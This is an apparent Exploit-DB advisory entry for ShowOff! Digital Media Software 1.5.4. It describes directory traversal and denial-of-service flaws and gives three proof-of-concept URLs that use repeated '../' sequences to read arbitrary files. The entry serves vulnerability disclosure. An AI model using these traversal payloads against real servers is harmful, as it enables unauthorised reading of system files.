showoff! digital media software 1.5.4 - Multiple Vulnerabilities

EDB-ID:

25649

CVE:

N/A


Platform:

CGI

Published:

2011-05-11

source: http://www.securityfocus.com/bid/13598/info

ShowOff! Digital Media Software is affected by multiple vulnerabilities. These issues can allow an attacker to carry out directory traversal and denial of service attacks.

ShowOff! Digital Media Software 1.5.4 is reportedly vulnerable. Other versions may be affected as well. 

http://www.example.com/ShowAlbum?ShowDetails&1&nocount&/../../../../../../../../../../[file]
http://www.example.com/ShowVideo?1&fullnocount&/../../../../../../../../../../[file]
http://www.example.com/ShowGraphic?/../../../../../../../../[file]